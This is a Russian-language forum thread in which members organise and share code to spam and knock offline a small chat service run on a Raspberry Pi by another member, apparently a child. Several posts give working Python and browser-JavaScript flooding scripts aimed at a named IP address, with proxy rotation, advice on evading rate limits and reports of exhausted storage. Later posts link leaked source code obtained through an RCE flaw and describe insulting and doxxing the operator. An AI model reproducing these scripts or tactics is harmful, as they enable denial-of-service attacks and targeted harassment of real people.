В этом итт тхреде мы будем пользоваться сервисом nocord созданным участником нашего форума. По мере использования, делимся скриптами и прочими решениями.
Также я объявляю следующие направления специальной олимпиады:
- Спам сервиса сообщениями
- Доведение сервиса до ошибки 503
- tbd
Как первый участник я покажу свой (chatgpt) код:
import requests
import random
import time
from concurrent.futures import ThreadPoolExecutor
# Функция для чтения прокси из файла
def read_proxies(proxy_file):
with open(proxy_file, 'r') as file:
proxies = [line.strip() for line in file.readlines()]
return proxies
# Функция для отправки формы
def submit_form(name, password, proxy):
url = "http://91.192.22.20/create.php"
# Формируем данные для отправки
data = {
'name': name,
'password': password,
'password2': password,
'public_submit': 'Создать публичный сервер',
}
# Настроим прокси
proxies = {
"http": proxy,
"https": proxy,
}
try:
# Отправляем POST запрос
response = requests.post(url, data=data, proxies=proxies, timeout=10)
# Проверяем статус код ответа
if response.status_code == 200:
print(f"[INFO] Успешно отправлена форма для сервера: {name}")
else:
print(f"[ERROR] Ошибка при отправке формы для {name}. Статус код: {response.status_code}")
except requests.RequestException as e:
print(f"[ERROR] Ошибка при отправке формы для {name}. Ошибка: {e}")
# Основной цикл
def main():
proxies = read_proxies('proxy.txt') # Читаем список прокси из файла
base_name = "пррррр посрал в парашу пррррр"
password = "12345"
iteration = 1
# Создаем пул потоков с 10 рабочими потоками
with ThreadPoolExecutor(max_workers=10) as executor:
while True:
# Генерируем уникальное имя сервера
name = f"{base_name}{iteration}"
# Выбираем случайный прокси из списка
proxy = random.choice(proxies)
# Выводим информацию о текущем шаге
print(f"[INFO] Попытка отправить форму для {name} с прокси {proxy}")
# Отправляем форму в отдельном потоке
executor.submit(submit_form, name, password, proxy)
# Инкрементируем итерацию
iteration += 1
# Увековечиваем шаг (например, задержка 1 секунда, чтобы не создавать слишком много задач одновременно)
time.sleep(0.1)
if __name__ == '__main__':
main()
Перемещено cocucka из tox
@cocucka закрепи тред пожалуйста
тебе после чатжпт пришлось что-то доделывать?
а кроме того, сосискин - мамкин пирожок и вахтер
Первый раз он не справился, я удалил чат и описал задачу поновой и более подробно, что я хочу, он сделал. Это он за раз выдал получается, я только тайминг поменял с 1 на 0.1
а в интернет он сам ходил посмотреть, что за страница, или ты описывал?
а кроме того, сосискин - мамкин пирожок и вахтер
Ну я ему адрес дал + скопировал html код формы, чтобы он разобрался че там
Сосич, ну это хуйня, тред проваливается вниз, хотя он в закрепе!
Это срупт что-то накрутил в запросах и сломал.
Лул, там опять вайп, до этого на все not found выдавал))
я пока чуть ему отдохнуть дал. Заметил, что сайты с проксями не хотят давать нормальный текстовый список, пришлось накалякать парсей, чтобы проксей было прям ОЧЕНЬ много, плюс еще один скрипт, который мне их проверит на качественное соединение с этим школосервером и т.д.
@MrSugoma чини давай, я сделал прям лайтово, а там все равно error 500
Ну и да, делюсь новым кодом:
import requests import threading import curses import time def send_request(proxy, stdscr, proxy_stats, thread_id): url = "http://91.192.22.20/create.php" headers = {'User-Agent': 'Mozilla/5.0'} session = requests.Session() session.proxies = {'http': proxy, 'https': proxy} increment = 1 while True: server_name = f"бульк среньк админу чмоне пописял в рот да насрал в парашу_{thread_id}_{increment}" data = {'name': server_name, 'password': '1488', 'password2': '1488', 'public_submit': 'Создать публичный сервер'} try: response = session.post(url, data=data, headers=headers, timeout=3) if response.status_code == 200: proxy_stats[proxy]['success'] += 1 else: proxy_stats[proxy]['errors'] += 1 except requests.RequestException: proxy_stats[proxy]['errors'] += 1 increment += 1 update_screen(stdscr, proxy_stats) time.sleep(2) def update_screen(stdscr, proxy_stats): stdscr.clear() stdscr.addstr(0, 0, "Многопоточная отправка формы с прокси:") sorted_proxies = sorted(proxy_stats.items(), key=lambda x: (x[1]['success'] / (x[1]['errors'] + 1e-6)), reverse=True) row = 1 for proxy, stats in sorted_proxies: success, errors = stats['success'], stats['errors'] stdscr.addstr(row, 0, f"Прокси: {proxy} | Успешно: {success} | Ошибки: {errors}") row += 1 stdscr.refresh() def main(stdscr): with open('proxy.txt', 'r') as f: proxies = [line.strip() for line in f.readlines()] proxy_stats = {proxy: {'success': 0, 'errors': 0} for proxy in proxies} threads = [] for thread_id, proxy in enumerate(proxies, 1): thread = threading.Thread(target=send_request, args=(proxy, stdscr, proxy_stats, thread_id)) threads.append(thread) thread.start() for thread in threads: thread.join() if __name__ == '__main__': curses.wrapper(main)прокси складывать в proxy.txt в формате IP:PORT
В общем у педалика сервер настолько всрат, что многопоточность только все портит. Переделал скрипт снова, теперь юзаем прокси по одной, как начнутся ошибки - переходим на следующую, таким образом он не сразу все спалит и сообщения публикуются чаще (хотя нагрузка на его малинку уменьшается)
import requests import time import curses from requests.exceptions import RequestException def load_proxies(filename="proxy.txt"): with open(filename, "r") as file: return [line.strip() for line in file.readlines()] def send_post_request(proxy, url, data): proxy_dict = {"http": f"http://{proxy}", "https": f"https://{proxy}"} try: response = requests.post(url, data=data, proxies=proxy_dict, timeout=1) if response.status_code == 200: return True, response.elapsed.total_seconds() * 1000 return False, None except RequestException: return False, None def main(stdscr): curses.curs_set(0) stdscr.nodelay(1) stdscr.timeout(1000) proxies = load_proxies("proxy.txt") url = "http://91.192.22.20/create.php" base_data = {"password": "45100", "password2": "45100", "public_submit": "true"} total_success = total_fails = 0 current_proxy_idx = 0 proxy_fail_count = proxy_success_count = counter = 0 while True: name = f"ПОПИСЯЛ В РОТ МИСТЕРУ СУГОМИКУ И ПОСРАЛ В ЕГО ПАРАШУ БУЛЬК СРЕНЬК{counter}" data = {**base_data, "name": name} success, latency = send_post_request(proxies[current_proxy_idx], url, data) counter += 1 if success: proxy_success_count += 1 total_success += 1 latency = round(latency, 2) if latency else 'N/A' else: proxy_fail_count += 1 total_fails += 1 stdscr.clear() stdscr.addstr(0, 0, f"CURRENT PROXY: {current_proxy_idx + 1}/{len(proxies)} | TOTAL SUCCESS: {total_success} | TOTAL FAILS: {total_fails}") stdscr.addstr(2, 0, f"PROXY {proxies[current_proxy_idx]} | SUCCESS: {proxy_success_count} | FAILS: {proxy_fail_count} | LATENCY: {latency} ms") if proxy_fail_count >= 10: proxy_fail_count = proxy_success_count = 0 current_proxy_idx += 1 if current_proxy_idx >= len(proxies): break stdscr.refresh() time.sleep(0.5) if __name__ == "__main__": curses.wrapper(main)Ну и методом тыка выяснил, что оптимальный вариант задержки примерно 0.5 секунды, если чаще то будут пропуски, медленее нет смысла. Ждем когда мистер сугомик заблокирует русские айпи и откроет доступ только в свою комнату (как в принципе и должно быть с локальным сервером на малинке).
upd2: мне вот идея пришла, что если найти ascii арт члена и спамить рисунок построчно?))))
Господи! 10 членов из 10! https://imgur.com/a/LiKa7KU
Членопад норм смотрится)
Этот даун все удалил (либо сайт сломался)
Еще один прикол кстати, внутри “треда” можно спамить довольно большими сообщениями, там страница начинает мегабайты весить за секунды (бедная малинка и еще более бедная та sd карточка)
js код для консоли браузера:
function generateRandomText(length) { const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; let result = ''; for (let i = 0; i < length; i++) { const randomIndex = Math.floor(Math.random() * characters.length); result += characters[randomIndex]; } return result; } function sendRandomMessage() { // Генерируем случайный текст длиной 100000 символов anonymousSendMessage.value = generateRandomText(100000); // Имитация отправки формы var event = new Event('submit'); anonymousSendForm.dispatchEvent(event); } // Бесконечно отправляем случайный текст каждые 0.1 секунды (100 миллисекунд) setInterval(sendRandomMessage, 100);Пока писал это сообщение, там уже 503 без шансов, даже не поднимается.
Еще питонячий вариант, через браузер не так удобно, он после сотни виснуть начинает
import requests import random import string import time # Функция для генерации случайного текста def generate_random_text(length): characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' result = ''.join(random.choice(characters) for _ in range(length)) return result # Функция для отправки случайного сообщения def send_random_message(proxy_list): url = 'http://91.192.22.20/servers/1/anonymous_send.php' random_text = generate_random_text(100000) # Параметры, как в JS-скрипте: передаем "message" data = {'message': random_text} # Пробуем использовать каждый прокси из списка for proxy in proxy_list: proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"} try: # Отправляем данные с типом контента 'application/x-www-form-urlencoded' headers = {'Content-Type': 'application/x-www-form-urlencoded'} response = requests.post(url, data=data, proxies=proxies, headers=headers, timeout=5) # Проверка успешного ответа if response.status_code == 200: print(f"Сообщение отправлено через прокси: {proxy}") break except requests.RequestException as e: print(f"Ошибка с прокси {proxy}: {e}") continue else: print("Не удалось отправить сообщение с использованием доступных прокси.") # Чтение прокси из файла def load_proxies(file_path): with open(file_path, 'r') as f: return [line.strip() for line in f.readlines()] # Основная функция def main(): proxies = load_proxies('proxy.txt') while True: send_random_message(proxies) time.sleep(0.1) # 100 мс между отправками if __name__ == "__main__": main()100 мс между отправками
Надо время рандомное сделать, чтобы не отфильтровал по частоте сообщений.
бедная малинка и еще более бедная та sd карточка
Лол.
и еще более бедная та sd карточка
Она особенно бедная, учитывая особенную структуру хранения данных в Nocord.
. |-- access.log |-- create.php |-- create_private.php |-- create_public.php |-- css | `-- index.css |-- error.log |-- index.php |-- messages.html |-- private_servers | `-- b3f72695a0 | |-- ANONYMOUS | |-- anonymous_send.php | |-- delete_message.php | |-- delete_server.php | |-- enable_or_disable_anonymous.php | |-- index.html | |-- messages | | |-- 1.php | | |-- 10.php | | |-- 11.php | | |-- 12.php | | |-- 2.php | | |-- 3.php | | |-- 4.php | | |-- 5.php | | |-- 6.php | | |-- 7.php | | |-- 8.php | | `-- 9.php | |-- name.txt | |-- number_of_max_message.txt | |-- password.txt | |-- send.php | `-- show.php |-- register.php |-- resources | |-- base_anonymous_send.php | |-- base_delete_message.php | |-- base_delete_server.php | |-- base_enable_or_disable_anonymous.php | |-- base_send.php | `-- base_show.php |-- send_message.php |-- servers | |-- 1 | | |-- ANONYMOUS | | |-- anonymous_send.php | | |-- delete_message.php | | |-- delete_server.php | | |-- enable_or_disable_anonymous.php | | |-- index.html | | |-- messages | | | |-- 3114.php | | | |-- 3115.php | | | |-- 3116.php | | | |-- 3117.php | | | |-- 3118.php | | | |-- 3119.php | | | |-- 3120.php | | | |-- 3121.php | | | |-- 3122.php | | | |-- 3123.php | | | |-- 3124.php | | | |-- 3125.php | | | |-- 3126.php | | | |-- 3127.php | | | |-- 3128.php | | | |-- 3129.php | | | |-- 3130.php | | | |-- 3131.php | | | |-- 3132.php | | | |-- 3133.php | | | |-- 3134.php | | | |-- 3135.php | | | |-- 3136.php | | | |-- 3137.php | | | |-- 3138.php | | | |-- 3139.php | | | |-- 3140.php | | | |-- 3141.php | | | |-- 3142.php | | | |-- 3143.php | | | |-- 3144.php | | | |-- 3145.php | | | `-- 3146.php | | |-- name.txt | | |-- number_of_max_message.txt | | |-- password.txt | | |-- send.php | | `-- show.php | `-- \320\273\320\277\321\210\320\273 | |-- ANONYMOUS | |-- anonymous_send.php | |-- delete_message.php | |-- delete_server.php | |-- enable_or_disable_anonymous.php | |-- index.html | |-- messages | |-- name.txt | |-- number_of_max_message.txt | |-- password.txt | |-- send.php | `-- show.php |-- show_messages.php `-- users |-- 1 | |-- messages.html | `-- password.txt |-- 12345 | |-- messages.html | `-- password.txt |-- 222 | |-- messages.html | `-- password.txt |-- MrSugoma | |-- messages.html | `-- password.txt |-- PRIME | |-- messages.html | `-- password.txt |-- Weever | |-- messages.html | `-- password.txt |-- chunbyonga | |-- messages.html | `-- password.txt |-- testtesttest | |-- messages.html | `-- password.txt `-- yapidr |-- messages.html `-- password.txt 21 directories, 113 filesТам твой miWifi китайский наружу смотрит жопой
У меня, скорее всего, какая-то открытая служба на порту этого miWifi работает. Я даже не знаю, что это такое.
Кстати, я там на ночь оставил скрипт который мегабайт данных в секунду тебе записывал, потом спать пошел, а сейчас ты почистил. Так там по итогу сколько забито было хоть расскажи?
Не знаю, но удалялось долго.
ты что, файлы из пхп создаешь? ой писец…
а кроме того, сосискин - мамкин пирожок и вахтер
Ну я подозревал, что там plain-text какой-то, в лучшем случае sqlite
ты что, файлы из пхп создаешь?
Да, но ввод санитайжу (прогоняю через
htmlspecialchars()). Раньше была PHP-инъекция из-за такого, теперь ее нет.
Членопад норм смотрится)
Ктоб сомневался, что тебе зайдëт. Пидор же.
Съеби обратно в свой сво-загон, специалист по пидорам.
Какой грозный кабанчик.
@crypt
ты вроде шаришь в жаббере?
я завязал с этим тредом) пусть делает, что хочет)
а кроме того, сосискин - мамкин пирожок и вахтер
тьфу на тебя, ну и иди обратно к своему кащу, обсуждайте в 100000-ый раз по кругу своих свиней
а ты хочешь, чтобы я всерьез эту поделку обсуждал? я во взрослых тредах на лоре никогда не сидел, потому что мне айти на работе хватало.
а у каща я там новости хотя бы читаю.
а кроме того, сосискин - мамкин пирожок и вахтер
Я в бар, если лениво не будет - запилю api для сохранения/показа мемасиков на базе нокорда. Хоть какая-то польза для интернетов будет от этой sd карточки.
Чивооо, так кокорд это твоя поделка?
Не, но это не помеха же.
Ты не смешной
А я и не старался пошутить.
https://www.linux.org.ru/add.jsp?group=4228&noinfo=1
Сюда можешь новость написать, но желательно длинее, чем две строки, иначе не пропустят. Тут уже все про стой кокорд знают.
Исходный код Nocord’а свободен для меня, этого уже достаточно для того, чтобы быть опен сурсом.
Ок, ждем новость на ЛОРе
Меня там забанят за “рекламу стороннего ресурса” моментально.
Или за клоунаду?
Ну, могут за “флуд” еще забанить.
Почему ты меня считаешь клоуном?
Мда, 5 клоунов аж собрал, маловато
В последнюю секунду тред сохранился на archive.is: https://archive.is/6Shbj .
У тебя на ЛОРе был ник Сугомик 😄
Не Сугомик, а Sugoming.
Исходный код Nocord’а свободен для меня, этого уже достаточно для того, чтобы быть опен сурсом.
Винда, получается тоже опенсурсная. Для Гейтса же код свободен.
Ладно. Код старых версий Nocord’а доступен для тех, кому хацкер отдал слитые сорцы из моего хомяка.
А канал у тебя дома какой? Я почти готов продукт выкатить. Жду домен везде пропишется. Только чур не вайпать.
А канал у тебя дома какой?
В ЛС в Nocord’е могу сказать. Мой ник там —
MrSugoma.
сугомик, разбань все айпишники и страны, я со своего хоста тоже какой-нибудь прикол прокину на твой кокорд, ну или можешь не разбанивать и сам там сиди тогда
разбань все айпишники и страны
Может быть, разбаню. Но это не точно.
Ну и иди на хуй
Вобщем я придумал. Постить мемасы в паблике неплохо, но скучно. Вот реальный юз-кейс, суть такова: сервис по передаче друг другу приватной полезной нагрузки - картинки/документы/whatever. Ну, типа, как атачменты в почте. Загрузил что надо передать - кинул приватную ссылку и готово. Версии две - одна полностью client side, т.е. unmanaged и версия про, придется отдельно индекс хранить и e2ee добавить.
Тебе задачи: добавить удаление из лички сообщений, увеличить уникальность (на 10 коллизий дохуя будет), перейти на https, разбанить всех, иначе кому куда что оиправлять, если не грузится. Бегом побежал выполнять, пыль запартная. Ах, да. create.php у тебя дважды код выдает - выпрямляй руки и исправляй.
Дай телегу (ну или добавь меня @egtwba если не хочешь свой палить)
Слыш, ты чо там разломал кхуям все? Мемасы не грузятся нихуя. Эдак у нас вся публика разбежится, ну.
Nocord сейчас всем выдает 403 из-за масштабной атаки ЛТшных ботов, которые создавали сотни тысяч юзеров, из-за чего у меня закончились inode’ы. Если я снова разрешу доступ в Nocord всем желающим, то уже за пару секунд мне сотку юзеров создадут. Решением проблемы, кроме, конечно же, вайтлиста IP-адресов, является каптча. Пожалуйста, дайте мне бесплатный российский сервис каптчи, желательно, чтобы каптча была не словесной, а картиночной (со светофорами).
Я упрлс, добавил прямые ссылки.
тест, тест, тест…
В смысле тест? Картинка на нокорде сейчас?
да, в этом тащем-то смысл. так мы вытащим нокорд к величию!
И вообще, сам зацени, где страждение по волшебсту)))
Да и нагрузочный тест никто не отменял. Только там из реальности image/jpeg, остальное говной с ошибками посыпет
А как затестить-то?
заходишь на nocord.pro, постишь мемасик, берешь ссылку, постишь сюда. profit
upd. Без абуза, сд-карта одна.
Сюда вставляешь стандартно через
![]()?Да
Заябись! Правда карточка заполнится через день-два. Но за реализацию респект.
Тест
Ну, а вы стебались. Надо видеть перьспективуууу))))
перьспективуууу))))
Нам придется скидываться сугомику на новую карточку
Если угнать на пре-альфе, там тупое ограничение на nocord.pro, linuxtalks.co и lt.pozi.net иначе должен быть хуй, но это не точно.
@cocucka, раз уж Сугоме доступ в Клуб закрыли, эту тему может в паблик надо?
Так это же для него тема
Ну, она в Клубе, а в Клуб у него доступа теперь нет. Поэтому предлагаю вытащить ее из Клуба, не?
Бля, я пропустил частицу “не” пока печатал, лол. Я имелл ввиду, что это тема для “исследующих” это поделие, а не для его автора.
Ну, он тут тоже много писал. Тема не политическая. Хз
Почему тема не для меня?
эту тему может в паблик надо
Лучше вернуть мне доступ в Клуб или перевести тему в Клуб ЛТ в Nocord’е.
http://91.192.22.20/servers/пописял на сугомика/
вот твой тред
Толсто!
Вот и хорошо, заканчивай флудить и принимайся за работу, у тебя конь не валялся, неделя прошла.
принимайся за работу
Не знаю, как в стране EE, но в России два выходных, суббота и воскресенье, а не один или ноль.
Какие тебе выходные, школололотрон? У тебя сейчас вся жизнь один сплошной выходной. Ну кроме периода, когда мамка заставляет кур пасти.
Толсто!
Внатуре, мелкий, ты что-то много слов выдаешь и мало делаешь. Марш делом заниматься!
мало делаешь
Доделываю один сайт, про который вам лучше не знать.
И що ты сделал за трудовую неделю? Сдеанонился, порвался и выпилился из клуба? Ну охуеть чудно время провел. Работай давай.
И що ты сделал за трудовую неделю?
Нашел аналог https://shell.segfault.net/ — https://codesandbox.io/.
он ещё и новую RCE добавил в результате вот слив последних исходников нокорда https://cdn.discordapp.com/attachments/1257970936137650178/1335210168849399879/Nocord-1.5.7.tar.gz?ex=679f56df&is=679e055f&hm=c05481c67218d17000c23c72348a3a2902d8fc61c2f10d09173957eaab0643f4&
Лол, я не могу поверить в это! То есть ситуация: 12 летний ребенок пишет код пхп чатика, попадает каким-то образом в линукс сообщество и оттуда как-то попадает в ЛТ который в принципе является каким-то андеграундом лора, я даже не знаю. Потом какой-то анонимус (из дискорда?) срывает покровы и даже выкладывает исходники, вам не кажется, что это какие-то пиздатые завороты?
Я если честно уже больше склоняюсь к варианту, что это какой-то прыщавый дрочер лет 30 который женщины не видел пришел нас “потралировать” и типо он траль, а мы лалки и он нас переиграл (шиз).
Да ну, у него общение как раз на этом уровне. Я еще до деанона у него спрашивал тебе лет 12 что ли. А пхп, ну интересно пацану, молодец, может потом профессиональным программистом станет. Для такого “тралирования” актерский талант нужен. Да и истерика от деанона у него была явно не поддельная.
пишет код пхп чатика, попадает каким-то образом в линукс сообщество
Ты перепутал местами это.
и оттуда как-то попадает в ЛТ
Я раньше на ЛОРе был, но постоянно получал там баны.
из дискорда?
Да.
даже выкладывает исходники
В Noges оказалась RCE-уязвимость.
уязвимость.
Так сейчас ты и есть самая главная уязвимость)
Я если честно уже больше склоняюсь к варианту, что это какой-то прыщавый дрочер лет 30 который женщины не видел пришел нас «потралировать» и типо он траль, а мы лалки и он нас переиграл (шиз).
Слишком тупо даже для такого варианта. Да и видно же, что школятина.
Nocord временно выдает всем 403, так как через уязвимость в Noges его сорцы слили, а потому могут найти уязвимости в огромном коде Nocord’а, из-за чего я от греха подальше всем выдаю 403 в Nocord. Самая уязвимость в Noges, похоже, пофикшена.
Nocord снова работает в штатном режиме.







